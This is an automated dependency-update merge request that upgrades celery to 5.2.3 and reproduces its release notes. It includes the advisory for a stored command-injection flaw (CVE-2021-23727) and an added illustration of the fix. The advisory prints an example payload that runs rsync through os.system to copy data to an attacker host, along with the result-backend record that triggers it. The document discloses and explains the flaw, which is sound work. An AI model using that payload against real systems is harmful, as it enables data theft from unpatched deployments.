
Update dependency celery to v5.2.3 (develop) - autoclosed

RenovateBot requested to merge renovate/develop-celery-5.x into develop

This MR contains the following updates:

==========================  ============  ======  ====================
Package                     Type          Update  Change
==========================  ============  ======  ====================
celery (source, changelog)  dependencies  minor   ==5.1.2 -> ==5.2.3
==========================  ============  ======  ====================

Release Notes

celery/celery

v5.2.3

Compare Source


:release-date: 2021-12-29 12:00 P.M UTC+6:00
:release-by: Asif Saif Uddin

  • Allow redis >= 4.0.2.
  • Upgrade minimum required pymongo version to 3.11.1.
  • Tested pypy3.8 beta (#6998).
  • Split Signature.or into subclasses' or (#7135).
  • Prevent duplication in event loop on Consumer restart.
  • Restrict setuptools>=59.1.1,<59.7.0.
  • Kombu bumped to v5.2.3
  • py-amqp bumped to v5.0.9
  • Some docs & CI improvements.

.. _version-5.2.2:

v5.2.2

Compare Source


:release-date: 2021-12-26 16:30 P.M UTC+2:00
:release-by: Omer Katz

  • Various documentation fixes.

  • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

    When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data attacker@192.168.56.100:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data attacker@192.168.56.100:~/data as the exception arguments like so:

    .. code-block:: python

       {
           "exc_module": "os",
           "exc_type": "system",
           "exc_message": "rsync /data attacker@192.168.56.100:~/data"
       }

    According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
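The condition the release note refers to, shown as an added illustration that is not Celery's own code: the type recovered from the stored exc_module/exc_type must be an exception class before it is instantiated with the stored message. The metadata dictionaries and the function names below are constructed for this example.

```python
import importlib
import inspect

# Constructed failure metadata (not taken from any real result backend),
# in the shape the release note quotes: a legitimate failed task ...
LEGITIMATE_FAILURE = {
    "exc_module": "builtins",
    "exc_type": "KeyError",
    "exc_message": "missing configuration key",
}

# ... and a hostile record whose "exception type" is a plain function. A
# harmless attribute is used so the test stays safe even if the check failed.
HOSTILE_FAILURE = {
    "exc_module": "os",
    "exc_type": "getcwd",
    "exc_message": "ignored",
}


class UnsafeExceptionType(ValueError):
    """Stored exception type does not resolve to an exception class."""


def resolve_exception_type(meta):
    """Look up exc_module.exc_type without calling whatever it resolves to."""
    module = importlib.import_module(meta["exc_module"])
    return getattr(module, meta["exc_type"], None)


def rebuild_exception(meta):
    """Reconstruct the consumer-side exception to re-raise to the caller.

    The security-relevant condition: the resolved attribute must be a class
    derived from BaseException. A function, module or constant is refused
    before it can be invoked with the attacker-controlled exc_message.
    """
    exc_type = resolve_exception_type(meta)
    if not (inspect.isclass(exc_type) and issubclass(exc_type, BaseException)):
        raise UnsafeExceptionType(
            f"{meta['exc_module']}.{meta['exc_type']} is not an exception type"
        )
    return exc_type(meta["exc_message"])


def is_safe_failure(meta):
    """True when the stored failure would be accepted by rebuild_exception."""
    try:
        rebuild_exception(meta)
    except UnsafeExceptionType:
        return False
    return True
```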

.. _version-5.2.1:

v5.2.1

Compare Source


:release-date: 2021-11-16 8.55 P.M UTC+6:00
:release-by: Asif Saif Uddin

  • Fix rstrip usage on bytes instance in ProxyLogger.
  • Pass logfile to ExecStop in celery.service example systemd file.
  • fix: reduce latency of AsyncResult.get under gevent (#7052)
  • Limit redis version: <4.0.0.
  • Bump min kombu version to 5.2.2.
  • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.
  • Remove dependency to case (#7077).
  • fix: task expiration is timezone aware if needed (#7065).
  • Initial testing of pypy-3.8 beta to CI.
  • Docs, CI & tests cleanups.

.. _version-5.2.0:

v5.2.0

Compare Source


:release-date: 2021-11-08 7.15 A.M UTC+6:00
:release-by: Asif Saif Uddin

  • Prevent from subscribing to empty channels (#7040)
  • Fix register_task method.
  • Fire task failure signal on final reject (#6980)
  • Limit pymongo version: <3.12.1 (#7041)
  • Bump min kombu version to 5.2.1

.. _version-5.2.0rc2:


Configuration

📅 Schedule: At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever MR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this MR and you won't be reminded about this update again.


This MR has been generated by Renovate Bot.
